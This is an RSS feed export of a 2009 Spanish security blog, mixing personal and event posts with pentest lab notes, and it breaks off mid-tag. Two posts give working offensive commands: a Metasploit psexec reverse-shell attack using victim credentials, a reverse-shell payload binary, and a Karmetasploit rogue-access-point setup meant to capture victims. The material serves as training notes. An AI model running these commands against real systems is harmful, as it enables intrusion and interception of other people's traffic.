<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/" xmlns:georss="http://www.georss.org/georss" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0"><channel><atom:id>tag:blogger.com,1999:blog-8471324546808744058</atom:id><lastBuildDate>Wed, 11 Nov 2009 18:16:50 +0000</lastBuildDate><title>KungFooSion</title><description>KungFooSion es el Blog de Leonardo Pigñer sobre Seguridad de Redes, Análisis Forense y Kung-Foo!</description><link>http://kungfoosion.blogspot.com/</link><managingEditor>noreply@blogger.com (KungFooSion)</managingEditor><generator>Blogger</generator><openSearch:totalResults>199</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" href="http://feeds.feedburner.com/KungFooSion" type="application/rss+xml" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com" /><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-7753415082700702602</guid><pubDate>Wed, 11 Nov 2009 18:11:00 +0000</pubDate><atom:updated>2009-11-11T15:16:50.203-03:00</atom:updated><title>Seguridad de los nuevos DNI Argentinos</title><description>&lt;div style="text-align: justify;"&gt;En el &lt;a href="http://www.mfsec.com.ar/blog/"&gt;blog de Matt&lt;/a&gt; me encontré con un interesante video de &lt;a href="http://www.lanacion.com"&gt;La Nación&lt;/a&gt; que relata las medidas de seguridad de los nuevos DNI Argentinos.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;object width="424" height="318"&gt;&lt;param name="movie" value="http://videos.lanacion.com.ar/flash/player/embed.swf?file=id=12415,46,"&gt;&lt;param name="file" value="id=12415,46,"&gt;&lt;embed allowfullscreen="true" flashvars="file=id=12415,46," width="424" height="318" src="http://videos.lanacion.com.ar/flash/player/embed_v5.swf?file=id=12415,46," type="application/x-shockwave-flash"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;Casualmente, hace alrededor de 1 mes inicie los tramites para obtener un nuevo DNI porque me perdieron el anterior (si Gesolmina, fuistes vos!), obviamente esperaba tener mi documento para el 2011, con suerte. Pero increíblemente, a solo unos días del anuncio de los nuevos DNI, hoy llego Correo Argentino a traerme mi nuevo documento!&lt;br /&gt;&lt;br /&gt;Ahora, yo no puedo tener mas mala suerte, el cartero me pedía un &lt;span style="font-style: italic;"&gt;"papelito"&lt;/span&gt; que supuestamente me dieron cuando realice el tramite, y como no se donde deje ese papelito, no me entrego el DNI... aaaarrgggggggHHH!!!&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-7753415082700702602?l=kungfoosion.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/tE-TgCBzW_w" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/tE-TgCBzW_w/seguridad-de-los-nuevos-dni-argentinos.html</link><author>noreply@blogger.com (KungFooSion)</author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://kungfoosion.blogspot.com/2009/11/seguridad-de-los-nuevos-dni-argentinos.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-7666409883684685012</guid><pubDate>Wed, 11 Nov 2009 17:24:00 +0000</pubDate><atom:updated>2009-11-11T14:28:21.635-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Conferencias</category><title>PampaSeg en Diciembre</title><description>&lt;div style="text-align: justify;"&gt;El próximo 4 y 5 de Diciembre tendrán lugar las &lt;a href="http://www.pampaseg.com"&gt;Jornadas de Software Libre y Seguridad Informatica en La Pampa&lt;/a&gt;.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.pampaseg.com"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 360px; height: 125px;" src="http://3.bp.blogspot.com/_8alnjaETaog/SvrzgscAKKI/AAAAAAAADZQ/jbqPt4KrjW4/s400/pampaseg_r1_c4.gif" alt="" id="BLOGGER_PHOTO_ID_5402898445994305698" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;El evento es abierto a toda la comunidad, con entrada libre y gratuita. El cupo es limitado a unas 100 personas aproximadamente, por lo cual se requerirá una pre-acreditación desde la web &lt;a href="http://www.pampaseg.com"&gt;http://www.pampaseg.com&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Voy a tener el gusto de dar una charla en este evento, asi que si estan por  La Pampa por esas fechas nos vemos alli!&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-7666409883684685012?l=kungfoosion.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/Wfv9jR8DY2Y" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/Wfv9jR8DY2Y/pampaseg-en-diciembre.html</link><author>noreply@blogger.com (KungFooSion)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_8alnjaETaog/SvrzgscAKKI/AAAAAAAADZQ/jbqPt4KrjW4/s72-c/pampaseg_r1_c4.gif" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://kungfoosion.blogspot.com/2009/11/pampaseg-en-diciembre.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-7153137071524784736</guid><pubDate>Sun, 08 Nov 2009 03:08:00 +0000</pubDate><atom:updated>2009-11-09T19:44:10.263-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">MetaSploit</category><title>Prefetch en Meterpreter</title><description>&lt;div style="text-align: justify;"&gt;Siempre me llama la atención la integración de técnicas forenses y anti-forenses al Penetration Testing, como el reciente script para Meterpreter que permite obtener los datos de Prefetch.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="font-weight: bold;font-size:130%;" &gt;¿ Que es Prefetch ?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;Cada vez que abrimos una aplicación en Windows se crea un archivo &lt;span style="font-style: italic;"&gt;".pf"&lt;/span&gt; en el directorio (&lt;span style="font-style: italic;"&gt;%SYSTEMROOT%\Prefetch\&lt;/span&gt;), este archivo contiene información para acelerar las aplicaciones que seran abiertas en el futuro.&lt;br /&gt;&lt;br /&gt;Dentro del archivo .pf podemos encontrar la fecha y hora en la que el archivo fue abierto, modificado o accedido por ultima vez, y también la cantidad de veces que este fue ejecutado.&lt;br /&gt;&lt;br /&gt;El nombre del archivo .pf se arma &lt;span style="font-style: italic;"&gt;"NOMBRE-HASH.pf"&lt;/span&gt;, en donde el HASH se calcula con el path del lugar en donde se encontraba el archivo, por lo que si este fue ejecutado de 2 lugares diferentes, vamos a tener 2 archivos .pf  diferentes.&lt;br /&gt;&lt;br /&gt;Durante un Penetration Test, conocer cuales son los programas mas utilizados en un sistema nos puede ayudar a identificar los hábitos del administrador o el rol de este sistema en la red.&lt;br /&gt;&lt;br /&gt;Hay una herramienta gratuita llamada &lt;a href="http://www.mitec.cz/wfa.html"&gt;Windows File Analyzer&lt;/a&gt; que nos permite visualizar el contenido de los archivos Prefetch:&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_8alnjaETaog/SvY2uiK-ItI/AAAAAAAADYY/UUuNxlHbyfg/s1600-h/WindowsFileAnalyzer.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 306px;" src="http://1.bp.blogspot.com/_8alnjaETaog/SvY2uiK-ItI/AAAAAAAADYY/UUuNxlHbyfg/s400/WindowsFileAnalyzer.png" alt="" id="BLOGGER_PHOTO_ID_5401564976152191698" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;Shell con Meterpreter&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;A continuación dos formas sencillas de obtener una shell con meterpreter sin necesidad de explotar una vulnerabilidad.&lt;br /&gt;&lt;br /&gt;El siguiente modulo es similiar al &lt;span style="font-style: italic;"&gt;"psexec"&lt;/span&gt; de SysInternals, y si le proveemos el user/pass de la víctima, nos permitira ejecutar un &lt;span style="font-style: italic;"&gt;"payload"&lt;/span&gt;:&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;pre class="codigo"&gt;&lt;br /&gt;use windows/smb/psexec&lt;br /&gt;set PAYLOAD windows/metepreter/reverse_tcp&lt;br /&gt;set RHOST 192.168.13.129&lt;br /&gt;set LHOST 192.168.13.131&lt;br /&gt;set SMBUser Administrador&lt;br /&gt;set SMBPass password&lt;br /&gt;exploit&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;Otra forma, es crear un binario con el payload, lo transferimos a la víctima, luego dejamos escuchando por la conexión reversa y ejecutamos el binario para generar la conexión con meterpreter:&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;pre class="codigo"&gt;&lt;br /&gt;./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.13.131 X &gt; meterpreter.exe&lt;br /&gt;&lt;br /&gt;./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.13.131 E&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;Prefetch con Meterpreter&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Para utilizar Prefetch primero deberíamos actualizar Metasploit (esto hacerlo antes de obtener la shell):&lt;br /&gt;&lt;br /&gt;&lt;pre class="codigo"&gt;&lt;br /&gt;cd /pentest/exploits/framework3&lt;br /&gt;svn update&lt;br /&gt;&lt;br /&gt;./msfconsole&lt;br /&gt;run prefetchtool -h&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_8alnjaETaog/SvY2iD5o7UI/AAAAAAAADYQ/PmQMzH4rHMk/s1600-h/prefetch01.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 177px;" src="http://1.bp.blogspot.com/_8alnjaETaog/SvY2iD5o7UI/AAAAAAAADYQ/PmQMzH4rHMk/s400/prefetch01.png" alt="" id="BLOGGER_PHOTO_ID_5401564761868004674" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;Si es la primera vez que utilizamos Prefetch, el script bajara &lt;span style="font-style: italic;"&gt;"prefetch.exe"&lt;/span&gt; del repositorio, para luego subirlo y ejecutarlo en la víctima. A continuación listamos los 5 programas mas utilizados en la víctima con el comando &lt;span style="font-style: italic; font-weight: bold;"&gt;"run prefetchtool -x 5"&lt;/span&gt;:&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_8alnjaETaog/SvY2YDYv-WI/AAAAAAAADYI/0RcUdUy59Aw/s1600-h/prefetch02.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 268px;" src="http://4.bp.blogspot.com/_8alnjaETaog/SvY2YDYv-WI/AAAAAAAADYI/0RcUdUy59Aw/s400/prefetch02.png" alt="" id="BLOGGER_PHOTO_ID_5401564589931362658" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;Otra feature interesante dentro de meterpreter es &lt;span style="font-style: italic;"&gt;"timestomp"&lt;/span&gt;, que nos permite modificar la fecha de creación, modificación y ultimo acceso de los archivos, pero eso lo dejo para otro post... ;)&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;FUENTES:&lt;/span&gt;&lt;br /&gt;- &lt;a href="http://milo2012.wordpress.com/2009/10/25/meterpreter-script-for-prefetch-tool-updated/"&gt;Milo2012's Security Blog: Meterpreter Script for Prefetch-Tool&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://laramies.blogspot.com/2008/12/windows-prefetcher-and-forensics.html"&gt;Laramies Corner: Windows Prefetcher and forensic analysis&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://www.mitec.cz/wfa.html"&gt;Windows File Analyzer&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://pauldotcom.com/wiki/index.php/Episode171"&gt;PaulDotCom - Episode 171&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://windowsir.blogspot.com/2005/03/what-is-prefetcher.html"&gt;What is the Prefetcher?&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://www.forensicswiki.org/wiki/Prefetch"&gt;Forensics Wiki - Prefetch&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-7153137071524784736?l=kungfoosion.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/zn8v0dxlzZo" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/zn8v0dxlzZo/prefetch-en-meterpreter.html</link><author>noreply@blogger.com (KungFooSion)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_8alnjaETaog/SvY2uiK-ItI/AAAAAAAADYY/UUuNxlHbyfg/s72-c/WindowsFileAnalyzer.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://kungfoosion.blogspot.com/2009/11/prefetch-en-meterpreter.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-6617656394553187754</guid><pubDate>Fri, 06 Nov 2009 15:48:00 +0000</pubDate><atom:updated>2009-11-06T13:19:17.104-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Trainings</category><title>Una Final Dramática!</title><description>&lt;div style="text-align: justify;"&gt;El día de ayer termino el COMBAT training (extended edition) con una final dramática en el CTF &lt;span style="font-style: italic;"&gt;"Capture The Flag"&lt;/span&gt;!&lt;br /&gt;&lt;br /&gt;La versión extendida del COMBAT training se dicto 1 día por semana, durante 5 semanas, e iba dirigida a quienes no podían tomarse una semana completa de training.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_8alnjaETaog/SvRGp1kjm7I/AAAAAAAADYA/qx-msW9_Ddg/s1600-h/grupal.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 252px;" src="http://1.bp.blogspot.com/_8alnjaETaog/SvRGp1kjm7I/AAAAAAAADYA/qx-msW9_Ddg/s400/grupal.JPG" alt="" id="BLOGGER_PHOTO_ID_5401019537693055922" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;Quiero felicitar a &lt;span style="font-weight: bold;"&gt;Patricio Castagnaro&lt;/span&gt; quien gano el CTF y se llevo la espada ninja, y también a &lt;span style="font-weight: bold;"&gt;Diego Nadares&lt;/span&gt; que dio una gran pelea en todo momento! También extender las felicitaciones a &lt;span style="font-weight: bold;"&gt;Esteban Piloni&lt;/span&gt; y &lt;span style="font-weight: bold;"&gt;Sergio &lt;/span&gt;&lt;span style="font-style: italic; font-weight: bold;"&gt;"Moises"&lt;/span&gt;&lt;span style="font-weight: bold;"&gt; Veron&lt;/span&gt; por el gran trabajo durante toda la semana!&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_8alnjaETaog/SvRGf9WcSMI/AAAAAAAADX4/wvMf-2D_Ahs/s1600-h/pato.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 296px;" src="http://2.bp.blogspot.com/_8alnjaETaog/SvRGf9WcSMI/AAAAAAAADX4/wvMf-2D_Ahs/s400/pato.JPG" alt="" id="BLOGGER_PHOTO_ID_5401019367982647490" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;Como siempre los premios del COMBAT training son armas orientales, esta vez teníamos la espada ninja para el primer lugar, un set de cuchillos para lanzar para el segundo y estrellas ninjas para el resto.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_8alnjaETaog/SvRGT2Pu7QI/AAAAAAAADXw/GRwiTzhwnVk/s1600-h/premios.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 267px;" src="http://4.bp.blogspot.com/_8alnjaETaog/SvRGT2Pu7QI/AAAAAAAADXw/GRwiTzhwnVk/s400/premios.JPG" alt="" id="BLOGGER_PHOTO_ID_5401019159917030658" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;Jeronimo Basaldua, el experto en Wireless Security de &lt;a href="http://www.base4sec.com"&gt;BASE4&lt;/a&gt;, dicto el modulo de Wireless Hacking del COMBAT training.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_8alnjaETaog/SvRFwYKRqEI/AAAAAAAADXo/Joj9wmlmg5g/s1600-h/jero.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 306px;" src="http://1.bp.blogspot.com/_8alnjaETaog/SvRFwYKRqEI/AAAAAAAADXo/Joj9wmlmg5g/s400/jero.JPG" alt="" id="BLOGGER_PHOTO_ID_5401018550545655874" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;Lamentablemente Jeronimo sufrió un accidente manipulando la espada (miren su frente en la foto grupal), al parecer Jeronimo estudiaba &lt;a style="font-style: italic;" href="http://es.wikipedia.org/wiki/Kend%C5%8D"&gt;kendo&lt;/a&gt; unos años atras y en una maniobra poco afortunada durante el training se corto a si mismo... :?&lt;br /&gt;&lt;br /&gt;Por consultas sobre el COMBAT training contactarse a capacitacion@base4sec.com&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-6617656394553187754?l=kungfoosion.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/2eCLNEat1Y8" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/2eCLNEat1Y8/una-final-dramatica.html</link><author>noreply@blogger.com (KungFooSion)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_8alnjaETaog/SvRGp1kjm7I/AAAAAAAADYA/qx-msW9_Ddg/s72-c/grupal.JPG" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">3</thr:total><feedburner:origLink>http://kungfoosion.blogspot.com/2009/11/una-final-dramatica.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-4164808380352006272</guid><pubDate>Thu, 05 Nov 2009 04:50:00 +0000</pubDate><atom:updated>2009-11-09T19:44:10.263-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">MetaSploit</category><title>Karmetasploit en BackTrack 4</title><description>&lt;div style="text-align: justify;"&gt;Actualizando algunos labs del COMBAT training para BackTrack 4, aquí les dejo algunas notas para jugar con Karmetasploit.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_8alnjaETaog/SvJZ0ibgDKI/AAAAAAAADXg/wJGYCQbrNE4/s1600-h/bt4_logo.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 191px;" src="http://3.bp.blogspot.com/_8alnjaETaog/SvJZ0ibgDKI/AAAAAAAADXg/wJGYCQbrNE4/s400/bt4_logo.jpg" alt="" id="BLOGGER_PHOTO_ID_5400477662300867746" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;pre class="codigo"&gt;&lt;br /&gt;- Ponemos la placa en modo monitor:&lt;br /&gt;&lt;br /&gt;airmon-ng start wlan0&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;- Levantamos el Access Point falso en la interfaz en modo&lt;br /&gt;monitor:&lt;br /&gt;&lt;br /&gt;airbase-ng -P -C 30 -e “Linksys” -v mon0&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;- Configuramos el rango de IPs que entregara el servidor&lt;br /&gt;DHCP:&lt;br /&gt;&lt;br /&gt;nano /etc/dhcp3/dhcpd.conf&lt;br /&gt;&lt;br /&gt;option domain-name-servers 10.0.0.1;&lt;br /&gt;default-lease-time 60;&lt;br /&gt;max-lease-time 72;&lt;br /&gt;ddns-update-style none;&lt;br /&gt;log-facility local7;&lt;br /&gt;&lt;br /&gt;subnet 10.0.0.0 netmask 255.255.255.0 {&lt;br /&gt;range 10.0.0.140 10.0.0.240;&lt;br /&gt;option routers 10.0.0.1;&lt;br /&gt;option domain-name-servers 10.0.0.1;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;- Configuramos la IP en la interfaz que creo airbase-ng:&lt;br /&gt;&lt;br /&gt;ifconfig at0 up 10.0.0.1 netmask 255.255.255.0&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;- Levantamos el DHCP que le entregara las IPs a las&lt;br /&gt;victimas que se conecten al Access Point falso:&lt;br /&gt;&lt;br /&gt;/etc/init.d/dhcp3-server start&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;- Vemos las IPs que entrega el DHCP:&lt;br /&gt;&lt;br /&gt;tail -f /var/log/messages&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;- Bajamos el script de Karma y corremos Metasploit:&lt;br /&gt;&lt;br /&gt;cd /pentest/exploits/framework3&lt;br /&gt;&lt;br /&gt;wget http://digitaloffense.net/tools/karma.rc&lt;br /&gt;&lt;br /&gt;./msfconsole -r karma.rc&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;- Podemos obtener los datos guardados en karma.db&lt;br /&gt;de esta forma:&lt;br /&gt;&lt;br /&gt;sqlite3 karma.db&lt;br /&gt;.tables&lt;br /&gt;select * from notes;&lt;br /&gt;.quit&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-4164808380352006272?l=kungfoosion.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/Ig7xKRk8hvQ" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/Ig7xKRk8hvQ/karmetasploit-en-backtrack-4.html</link><author>noreply@blogger.com (KungFooSion)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_8alnjaETaog/SvJZ0ibgDKI/AAAAAAAADXg/wJGYCQbrNE4/s72-c/bt4_logo.jpg" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total><feedburner:origLink>http://kungfoosion.blogspot.com/2009/11/karmetasploit-en-backtrack-4.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-2941716717944992830</guid><pubDate>Mon, 02 Nov 2009 02:16:00 +0000</pubDate><atom:updated>2009-11-09T19:54:30.411-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">PaintBall</category><title>Tres Minutos de Furia</title><description>&lt;div style="text-align: justify;"&gt;Hoy tuvo lugar la 2a fecha del Torneo Argentino de Paintball y pase la tarde como &lt;span style="font-style: italic;"&gt;"utilero"&lt;/span&gt; del equipo &lt;a href="http://www.lod.com.ar/paintball/index.html"&gt;LOD (Legion of Doom)&lt;/a&gt;, unos amigos que competían.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;object width="425" height="344"&gt;&lt;param name="movie" value="http://www.youtube.com/v/bkrx4nT9vmA&amp;amp;hl=en&amp;amp;fs=1"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/bkrx4nT9vmA&amp;amp;hl=en&amp;amp;fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;Todavía me acuerdo de los comienzos de LOD y ese famoso partido en Urban Paintball &lt;a style="font-weight: bold;" href="http://kungfoosion.blogspot.com/2008/05/somos-como-somos-2.html"&gt;donde nos robaron&lt;/a&gt; de comienzo a fin... :P&lt;br /&gt;&lt;br /&gt;Go Go Go LOD! Vamos por la tercer fecha! ;-)&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-2941716717944992830?l=kungfoosion.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/1jFEpbG5gDc" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/1jFEpbG5gDc/tres-minutos-de-furia.html</link><author>noreply@blogger.com (KungFooSion)</author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://kungfoosion.blogspot.com/2009/11/tres-minutos-de-furia.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-46492888085510989</guid><pubDate>Tue, 27 Oct 2009 16:04:00 +0000</pubDate><atom:updated>2009-11-09T20:13:34.960-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Conferencias</category><title>Publicados los Videos del Seminario de ArCERT</title><description>&lt;div style="text-align: justify;"&gt;&lt;a href="http://www.arcert.gov.ar/"&gt;&lt;span style="font-weight: bold;"&gt;ArCERT&lt;/span&gt;&lt;/a&gt; publico los videos de las &lt;a href="http://www.arcert.gov.ar/10_aniv/"&gt;jornadas de seguridad&lt;/a&gt; realizadas recientemente para festejar sus 10 años de vida.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_8alnjaETaog/SucoX4Hz5uI/AAAAAAAADWI/jKmIgDmoP3s/s1600-h/side_column_image.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 300px; height: 175px;" src="http://4.bp.blogspot.com/_8alnjaETaog/SucoX4Hz5uI/AAAAAAAADWI/jKmIgDmoP3s/s400/side_column_image.jpg" alt="" id="BLOGGER_PHOTO_ID_5397327069094078178" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;El evento tuvo lugar el 1 y 2 de Octubre, y se dividio en un dia de seminarios y otro de talleres sobre seguridad informática. El evento fue realmente excelente, principalmente por la calidad de los oradores, asi que mis felicitaciones para el ArCERT.&lt;br /&gt;&lt;/div&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;Videos de los TALLERES:&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;- &lt;span style="font-size:130%;"&gt;&lt;a style="font-weight: bold;" href="http://www.youtube.com/watch?v=HeoqvioG16Y"&gt;Ingeniería reversa de malware: Una introducción&lt;/a&gt;&lt;/span&gt; (Hernan Racciatti)&lt;br /&gt;&lt;br /&gt;- &lt;span style="font-size:130%;"&gt;&lt;a style="font-weight: bold;" href="http://www.youtube.com/watch?v=OEgDS90FnI0"&gt;Wireless 802.11 "el otro lado"&lt;/a&gt;&lt;/span&gt; (Ezequiel Sallis)&lt;br /&gt;&lt;br /&gt;- &lt;span style="font-size:130%;"&gt;&lt;a style="font-weight: bold;" href="http://www.youtube.com/watch?v=VvbNCB6eAOQ"&gt;Tendencias de seguridad en tecnologías para aplicaciones&lt;/a&gt;&lt;/span&gt; (Ivan Arce)&lt;br /&gt;&lt;br /&gt;- &lt;span 